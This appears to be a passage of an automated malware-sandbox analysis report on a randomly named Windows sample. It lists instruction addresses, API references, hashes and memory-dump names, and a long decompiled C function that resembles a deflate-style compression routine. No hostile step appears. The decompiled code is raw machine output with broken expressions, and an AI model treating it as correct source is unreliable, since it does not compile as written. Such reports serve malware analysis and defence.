0x00000000
0x013e6ec0
0x013e6ec3
0x013e6ec3
0x013e6ebe
0x013e6ed0
0x013e6ed3
0x013e6edb
0x013e6ee1
0x013e6ee8
0x013e6eef
0x013e6efa
0x013e6f04
0x013e6f0c
0x013e6f16
0x013e6f19
0x013e6f1c
0x013e6f22
0x013e6f24
0x013e6f24
0x013e6f2a
0x013e6f2f
0x013e6f31
0x013e6f31
0x013e6f34
0x013e6f38
0x013e6f3c
0x013e6f24
0x013e6f42
0x013e6f4c
0x013e6f4f
0x013e6f4f
0x013e6f52
0x013e6f58
0x013e6f60
0x013e6f60
0x013e6f66
0x013e6f6b
0x013e6f6d
0x013e6f6d
0x013e6f70
0x013e6f74
0x013e6f78
0x013e6f60
0x013e6f58
0x013e6f7e
0x013e6f8b
0x013e6f8e
0x013e6f8e
0x013e6f91
0x013e6f97
0x013e6fa0
0x013e6fa0
0x013e6fa6
0x013e6fab
0x013e6fad
0x013e6fad
0x013e6fb0
0x013e6fb4
0x013e6fb8
0x013e6fa0
0x013e6fc2
0x013e6fc5
0x013e6fc8
0x013e6fcb
0x013e6fce
0x013e7016
0x013e701f
0x013e712b
0x00000000
0x013e7025
0x013e7027
0x013e7030
0x013e7033
0x013e7036
0x013e703c
0x013e7040
0x013e7040
0x013e7046
0x013e704b
0x013e704d
0x013e704d
0x013e7050
0x013e7054
0x013e7058
0x013e7040
0x013e705e
0x013e7063
0x013e7067
0x013e7070
0x013e7073
0x013e7073
0x013e7079
0x013e707e
0x013e7080
0x013e7080
0x013e7083
0x013e7087
0x013e708b
0x013e7073
0x013e7091
0x013e7096
0x013e7096
0x013e709f
0x013e70a2
0x013e70a2
0x013e70a5
0x013e70ab
0x013e70b0
0x013e70b0
0x013e70b6
0x013e70bb
0x013e70bd
0x013e70bd
0x013e70c0
0x013e70c4
0x013e70c8
0x013e70b0
0x013e70ce
0x013e70d5
0x013e70d5
0x013e70db
0x013e70e0
0x013e70e3
0x013e70f7
0x013e70fa
0x013e70fa
0x013e70fd
0x013e7103
0x013e7105
0x013e7105
0x013e710b
0x013e7110
0x013e7112
0x013e7112
0x013e7115
0x013e7119
0x013e711d
0x013e7105
0x013e7123
0x013e7124
0x013e7129
0x013e70db
0x013e6fd0
0x013e6fd7
0x013e6fe8
0x013e6fdf
0x013e6fe0
0x013e6fe0
0x013e6fed
0x013e6ff2
0x013e6ff7
0x013e6ffa
0x013e6fff
0x013e712e
0x013e7130
0x013e7136
0x013e7139
0x013e713c
0x013e713f
0x013e7144
0x013e7149
0x013e7149
0x013e7013
0x013e7013
0x00000000
0x013e7013
0x013e6fff
0x013e714e
0x013e7153
0x013e7159
0x013e715f
0x013e71f3
0x013e71f7
0x013e71fa
0x013e71fd
0x013e7203
0x013e7205
0x013e7205
0x013e720b
0x013e7210
0x013e7212
0x013e7212
0x013e7215
0x013e7219
0x013e721d
0x013e7205
0x013e7223
0x013e7228
0x013e722c
0x013e7235
0x013e7238
0x013e7238
0x013e723e
0x013e7243
0x013e7245
0x013e7245
0x013e7248
0x013e724c
0x013e7250
0x013e7238
0x013e7256
0x013e7260
0x013e7260
0x013e7268
0x013e726b
0x013e726b
0x013e726e
0x013e7274
0x013e7276
0x013e7276
0x013e727c
0x013e7281
0x013e7283
0x013e7283
0x013e7286
0x013e728a
0x013e728e
0x013e7276
0x013e7294
0x013e729a
0x013e729a
0x013e7165
0x013e7167
0x013e716b
0x013e7174
0x013e7177
0x013e7177
0x013e717d
0x013e7182
0x013e7184
0x013e7184
0x013e7187
0x013e718b
0x013e718f
0x013e7177
0x013e719c
0x013e71a2
0x013e71a5
0x013e71b0
0x013e71b0
0x013e71ba
0x013e71bd
0x013e71bd
0x013e71c0
0x013e71c6
0x013e71c8
0x013e71c8
0x013e71ce
0x013e71d3
0x013e71d5
0x013e71d5
0x013e71d8
0x013e71dc
0x013e71e0
0x013e71c8
0x013e71e6
0x013e71e9
0x013e71e9
0x013e71ec
0x013e719c
0x013e715f
0x013e72ab
0x013e72bc
0x013e72cb
0x013e72d1
0x013e72da
0x013e72e0
0x013e72e3
0x013e72e6
0x013e72ed
0x013e72f4
0x013e72f6
0x013e7382
0x013e738b
0x013e72fc
0x013e72ff
0x013e7336
0x013e733e
0x013e737c
0x00000000
0x013e7340
0x013e7343
0x013e7352
0x013e735a
0x013e7360
0x013e7369
0x013e736b
0x00000000
0x013e736d
0x013e736d
0x013e7373
0x013e737b
0x013e737b
0x013e736b
0x013e7301
0x013e730d
0x013e731c
0x013e7323
0x00000000
0x013e7326
0x013e7326
0x013e7335
0x013e7335
0x013e7323
0x013e72ff

APIs

memset.NTDLL ref: 013E72AB
memset.NTDLL ref: 013E72BC

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: e32216b7503b0612a40d4c954c503fb352821f7f9fd3f692c507ce5863c54f56
Instruction ID: 2947e4ca2fe72572fd78c52da2c645ec4b78fee2301d2b92c52f24c69255285d
Opcode Fuzzy Hash: e32216b7503b0612a40d4c954c503fb352821f7f9fd3f692c507ce5863c54f56
Instruction Fuzzy Hash: F3025470511B208FD776CF29C688666BBF1FF44628B640A2EC6E786E91D336F845CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013E8D50, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(?), ref: 013E8D6D
GetNativeSystemInfo.KERNEL32(?), ref: 013E8D77

Memory Dump Source

Source File: 00000001.00000002.197424310.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true

Associated: 00000001.00000002.197421238.00000000013E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197429793.00000000013EB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.197432264.00000000013EC000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.197434673.00000000013ED000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13e0000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 6f56cae939346b261b867f41d4c786a9ad430e467128d2b2f049fe926e0c73dd
Instruction ID: d0354c69d0d4a8337db6a6fe6e153a0856fe63b0a9aa098bbe045b03a185782c
Opcode Fuzzy Hash: 6f56cae939346b261b867f41d4c786a9ad430e467128d2b2f049fe926e0c73dd
Instruction Fuzzy Hash: BFF03132D106184BF761CF6ACC056CCB7F9EB89304F0481A0E42DF6649D6B4EA15DB50

Uniqueness

Uniqueness Score: -1.00%

Function 013E77F0, Relevance: .6, Instructions: 581
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E013E77F0(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t390;
				void* _t402;
				signed int _t410;
				unsigned int* _t411;
				unsigned int* _t420;
				signed int _t432;
				unsigned int* _t434;
				unsigned int* _t451;
				unsigned int* _t453;
				void* _t463;
				void* _t480;
				signed int _t483;
				signed int _t494;
				signed char _t504;
				signed int _t508;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr* _t516;
				intOrPtr* _t517;
				intOrPtr _t520;
				intOrPtr _t522;
				intOrPtr _t523;
				signed int _t524;
				signed int _t528;
				signed char* _t531;
				void* _t534;
				signed char _t538;
				signed char _t543;
				void* _t548;
				void* _t550;
				intOrPtr* _t551;
				intOrPtr _t555;
				intOrPtr _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				signed int _t564;
				intOrPtr* _t567;
				intOrPtr* _t571;
				intOrPtr _t572;
				signed int _t573;
				signed int _t575;
				signed int _t576;
				signed int _t579;
				signed int _t582;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				void* _t594;
				signed int _t595;
				signed int _t600;
				intOrPtr _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				intOrPtr* _t612;

				_t612 = __ecx;
				_v76 = __ecx;
				_t571 =  *((intOrPtr*)(__ecx + 0x84));
				_t601 =  *((intOrPtr*)(__ecx + 0x88));
				_t375 =  *((intOrPtr*)(__ecx + 0x80));
				_v12 = _t571;
				_v20 = _t601;
				_v48 = _t375;
				L2:
				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
					_t520 =  *((intOrPtr*)(_t612 + 0x20));
					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
						if(_t601 != 0) {
							while(1) {
								_t557 =  *((intOrPtr*)(_t612 + 0x20));
								if(_t557 >= 0x102) {
									goto L11;
								}
								_t601 = _t601 - 1;
								_t510 =  *_t571;
								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
								_v20 = _t601;
								_t571 = _t571 + 1;
								_v12 = _t571;
								 *(_t483 + _t612 + 0x90) = _t510;
								if(_t483 < 0x101) {
									 *(_t483 + _t612 + 0x8090) = _t510;
								}
								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
								_t558 =  *((intOrPtr*)(_t612 + 0x20));
								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
									_t579 = _t608 & 0x00007fff;
									_t89 = _t608 + 1; // 0x11
									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
									_t571 = _v12;
									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
									_t601 = _v20;
								}
								if(_t601 != 0) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					} else {
						_t494 =  *(_t612 + 0x1c) + _t520;
						_t610 = _t494 & 0x00007fff;
						_t13 = _t494 - 2; // 0xe
						_t511 = _t13;
						_t16 = _t511 + 1; // 0xf
						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
						_t502 =  <  ? _v20 : 0x102 - _t520;
						_v20 = _v20 - 0x102;
						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						_v56 = _v12 + 0x102;
						_t567 = _v12;
						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						while(_t567 != _v56) {
							_t504 =  *_t567;
							_v12 = _t567 + 1;
							 *(_t612 + _t610 + 0x90) = _t504;
							if(_t610 < 0x101) {
								 *(_t610 + _t612 + 0x8090) = _t504;
							}
							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
							_t610 = _t610 + 0x00000001 & 0x00007fff;
							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
							_t567 = _v12;
							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
							_t511 = _t511 + 1;
						}
						_t601 = _v20;
					}
					L11:
					_t572 =  *((intOrPtr*)(_t612 + 0x20));
					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
					_v24 = _t522;
					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
					if(_v48 != 0 || _t572 >= 0x102) {
						_t380 =  *((intOrPtr*)(_t612 + 0x50));
						_t602 = 0;
						_v64 = _t380;
						_v56 = 1;
						_t508 =  !=  ? _t380 : 2;
						_v8 = 0;
						_t381 =  *(_t612 + 0x1c);
						_v28 = _t381;
						_v28 = _v28 & 0x00007fff;
						_v16 = 2;
						if(( *(_t612 + 8) & 0x00090000) == 0) {
							_t382 = _t381 & 0x00007fff;
							_t523 = _v24;
							_v32 = _t382;
							_t603 = _t382;
							_v52 = 2;
							asm("sbb eax, eax");
							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
							_v72 = _t612 + 0x90;
							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
							if(_t572 > 2) {
								while(1) {
									_t125 =  &_v60;
									 *_t125 = _v60 - 1;
									if( *_t125 == 0) {
										goto L33;
									}
									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
									if(_t604 == 0) {
										goto L33;
									} else {
										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
										_v40 = _t592;
										if(_t592 > _t523) {
											goto L33;
										} else {
											_t603 = _t604 & 0x00007fff;
											_t548 = _v52 + _t612;
											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
												L51:
												if(_t592 == 0) {
													goto L33;
												} else {
													_t523 = _v24;
													_t516 = _t612 + 0x90 + _t603;
													if( *_t516 != _v68) {
														_t508 = _v16;
														continue;
													} else {
														_t550 = _v32 + _t612 + 0x90;
														_t594 = 0x20;
														while(1) {
															_t160 = _t550 + 2; // 0x7401fe83
															_t551 = _t550 + 2;
															_t517 = _t516 + 2;
															if( *_t160 !=  *_t517) {
																break;
															}
															_t161 = _t551 + 2; // 0xfe83f08b
															_t551 = _t551 + 2;
															_t517 = _t517 + 2;
															if( *_t161 ==  *_t517) {
																_t162 = _t551 + 2; // 0xf08bffff
																_t551 = _t551 + 2;
																_t517 = _t517 + 2;
																if( *_t162 ==  *_t517) {
																	_t163 = _t551 + 2; // 0xfffffe61
																	_t551 = _t551 + 2;
																	_t517 = _t517 + 2;
																	if( *_t163 ==  *_t517) {
																		_t594 = _t594 - 1;
																		if(_t594 != 0) {
																			continue;
																		}
																	}
																}
															}
															break;
														}
														_v36 = _t551;
														_t595 = _v40;
														if(_t594 == 0) {
															_t602 = _t595;
															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
															_v16 = 0x102;
															goto L34;
														} else {
															_t612 = _v76;
															_t508 = _v16;
															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
															_t523 = _v24;
															if(_t463 <= _v52) {
																continue;
															} else {
																_v8 = _v40;
																_t555 =  *((intOrPtr*)(_t612 + 0x20));
																_t600 =  <  ? _t555 : _t463;
																_v52 = _t600;
																_t508 = _t600;
																_v16 = _t508;
																if(_t600 == _t555) {
																	goto L33;
																} else {
																	_t523 = _v24;
																	_t184 = _t612 + 0x8f; // 0x3e279020
																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
																	continue;
																}
															}
														}
													}
												}
											} else {
												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
												if(_t605 == 0) {
													goto L33;
												} else {
													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
													_v40 = _t592;
													if(_t592 > _v24) {
														goto L33;
													} else {
														_t603 = _t605 & 0x00007fff;
														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
															goto L51;
														} else {
															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
															if(_t606 == 0) {
																goto L33;
															} else {
																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
																_v40 = _t592;
																if(_t592 > _v24) {
																	goto L33;
																} else {
																	_t603 = _t606 & 0x00007fff;
																	_t523 = _v24;
																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
																		continue;
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L95:
									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
									_t530 =  <  ? _t402 : 0x8000;
									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
									_t531 =  *(_t612 + 0x28);
									if(_t531 > _t612 + 0x1926a) {
										L99:
										_t601 = _v20;
										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
										_t534 = E013E6E70(_t612, 0);
										if(_t534 != 0) {
											return 0 | _t534 > 0x00000000;
										} else {
											_t375 = _v48;
											goto L1;
										}
									} else {
										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
										_t601 = _v20;
										_t375 = _v48;
										if(_t585 <= 0x7c00) {
											L1:
											_t571 = _v12;
											goto L2;
										} else {
											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
												goto L99;
											} else {
												_t375 = _v48;
												if(( *(_t612 + 8) & 0x00080000) == 0) {
													goto L1;
												} else {
													goto L99;
												}
											}
										}
									}
									goto L103;
								}
								goto L33;
							} else {
								L33:
								_t602 = _v8;
							}
							goto L34;
						} else {
							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
								L34:
								if(_t508 != 3 || _t602 < 0x2000) {
									goto L36;
								} else {
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									goto L65;
								}
							} else {
								_t508 = 0;
								_v16 = 0;
								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
								if(_t572 == 0) {
									L31:
									_t508 = 0;
									_v16 = 0;
									L36:
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									if(_t573 == _t602) {
										L65:
										_t508 = 0;
										_t602 = 0;
										_v16 = 0;
									} else {
										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
											goto L65;
										}
									}
								} else {
									_t480 = _v28 + _t612;
									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
										_t508 = _t508 + 1;
										if(_t508 < _t572) {
											continue;
										}
										break;
									}
									_v16 = _t508;
									if(_t508 < 3) {
										goto L31;
									} else {
										_t602 = 1;
										goto L34;
									}
								}
							}
						}
						_t390 = _v64;
						if(_t390 == 0) {
							if(_t602 != 0) {
								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
									_t316 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t319 = _t602 - 1; // -1
									_t509 = _t319;
									_t575 = _t509 >> 8;
									 *( *(_t612 + 0x28)) = _t316;
									( *(_t612 + 0x28))[1] = _t509;
									( *(_t612 + 0x28))[2] = _t575;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t327 = _t612 + 0x38;
									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t327 == 0) {
										_t411 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t411;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t411[0]);
									}
									_t576 = _t575 & 0x0000007f;
									_t333 = (_t509 & 0x000001ff) + 0x13eb220; // 0x201001d
									_t334 = _t576 + 0x13eb1a0; // 0x12000000
									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										_t410 =  *(0x13eb41a + _t528 * 2) & 0x0000ffff;
										goto L94;
									}
								} else {
									_t528 = _v56;
									_t414 =  <  ? _t573 : 0x8100;
									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								}
							} else {
								_t417 =  <  ? _t573 : 0x8100;
								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t538;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t299 = _t612 + 0x38;
								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t299 == 0) {
									_t420 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t420;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t420[0]);
								}
								_t410 = _t538 & 0x000000ff;
								_t528 = _v56;
								L94:
								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
							}
						} else {
							if(_t508 <= _t390) {
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
								 *( *(_t612 + 0x28)) = _t390 - 3;
								_t587 = _t513 >> 8;
								( *(_t612 + 0x28))[1] = _t513;
								( *(_t612 + 0x28))[2] = _t587;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
								_t266 = _t612 + 0x38;
								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t266 == 0) {
									_t434 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t434;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t434[0]);
								}
								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0x13eb220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x13eb1a0) & 0x000000ff;
								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x13eb220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x13eb1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x13eb220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x13eb1a0) & 0x000000ff) * 2)) + 1;
								_t432 = _v64;
								if(_t432 >= 3) {
									 *((short*)(_t612 + 0x8192 + ( *(0x13eb41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x13eb41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
								}
								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
								 *((intOrPtr*)(_t612 + 0x50)) = 0;
							} else {
								_t543 =  *(_t612 + 0x54);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t543;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t200 = _t612 + 0x38;
								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t200 == 0) {
									_t453 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t453;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t453[0]);
								}
								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
								if(_t508 < 0x80) {
									_t528 = _v56;
									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								} else {
									_t213 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t216 = _t602 - 1; // -1
									_t514 = _t216;
									_t590 = _t514 >> 8;
									 *( *(_t612 + 0x28)) = _t213;
									( *(_t612 + 0x28))[1] = _t514;
									( *(_t612 + 0x28))[2] = _t590;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t224 = _t612 + 0x38;
									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t224 == 0) {
										_t451 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t451;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t451[0]);
									}
									_t591 = _t590 & 0x0000007f;
									_t230 = (_t514 & 0x000001ff) + 0x13eb220; // 0x201001d
									_t231 = _t591 + 0x13eb1a0; // 0x12000000
									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										 *((short*)(_t612 + 0x8192 + ( *(0x13eb41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x13eb41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
									}
									 *((intOrPtr*)(_t612 + 0x50)) = 0;
								}
							}
						}
						goto L95;
					} else {
						break;
					}
					L103:
				}
				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
				return 1;
				goto L103;
			}

0x013e77f8
0x013e77fb
0x013e77fe
0x013e7804
0x013e780a
0x013e7810
0x013e7813
0x013e7816
0x00000000
0x013e7820
0x013e7838
0x013e7840
0x013e79c6
0x013e79d0
0x013e79d0
0x013e79d9
0x00000000
0x00000000
0x013e79e2
0x013e79e3
0x013e79e7
0x013e79ec
0x013e79ef
0x013e79f0
0x013e79f3
0x013e79ff
0x013e7a01
0x013e7a01
0x013e7a08
0x013e7a0e
0x013e7a16
0x013e7a1e
0x013e7a25
0x013e7a38
0x013e7a56
0x013e7a60
0x013e7a68
0x013e7a6b
0x013e7a73
0x013e7a73
0x013e7a78
0x00000000
0x00000000
0x013e7a7e
0x00000000
0x013e7a78
0x013e79d0
0x013e7846
0x013e7849
0x013e784d
0x013e7853
0x013e7853
0x013e7865
0x013e7878
0x013e7887
0x013e788b
0x013e7890
0x013e7893
0x013e7896
0x013e7899
0x013e789f
0x013e78a1
0x013e78a4
0x013e78a7
0x013e78b4
0x013e78b6
0x013e78b6
0x013e78ce
0x013e78d4
0x013e78e2
0x013e78ea
0x013e78ed
0x013e78f5
0x013e78f6
0x013e78fb
0x013e78fb
0x013e78fe
0x013e78fe
0x013e790d
0x013e7914
0x013e7917
0x013e791a
0x013e7928
0x013e792b
0x013e792f
0x013e7937
0x013e793e
0x013e7941
0x013e7944
0x013e7947
0x013e794a
0x013e7958
0x013e795b
0x013e7a8a
0x013e7a8f
0x013e7a92
0x013e7a95
0x013e7a9a
0x013e7a9d
0x013e7aa3
0x013e7aac
0x013e7abb
0x013e7ac8
0x013e7acd
0x013e7b13
0x013e7b13
0x013e7b13
0x013e7b16
0x00000000
0x00000000
0x013e7b18
0x013e7b22
0x00000000
0x013e7b24
0x013e7b29
0x013e7b2c
0x013e7b31
0x00000000
0x013e7b33
0x013e7b36
0x013e7b3f
0x013e7b49
0x013e7bc0
0x013e7bc2
0x00000000
0x013e7bc8
0x013e7bd1
0x013e7bd4
0x013e7bd9
0x013e7b10
0x00000000
0x013e7bdf
0x013e7be8
0x013e7bea
0x013e7bf0
0x013e7bf0
0x013e7bf4
0x013e7bf7
0x013e7bfd
0x00000000
0x00000000
0x013e7bff
0x013e7c03
0x013e7c06
0x013e7c0c
0x013e7c0e
0x013e7c12
0x013e7c15
0x013e7c1b
0x013e7c1d
0x013e7c21
0x013e7c24
0x013e7c2a
0x013e7c2c
0x013e7c2d
0x00000000
0x00000000
0x013e7c2d
0x013e7c2a
0x013e7c1b
0x00000000
0x013e7c0c
0x013e7c31
0x013e7c34
0x013e7c37
0x013e7ca0
0x013e7ca5
0x013e7ca9
0x00000000
0x013e7c39
0x013e7c41
0x013e7c4e
0x013e7c54
0x013e7c57
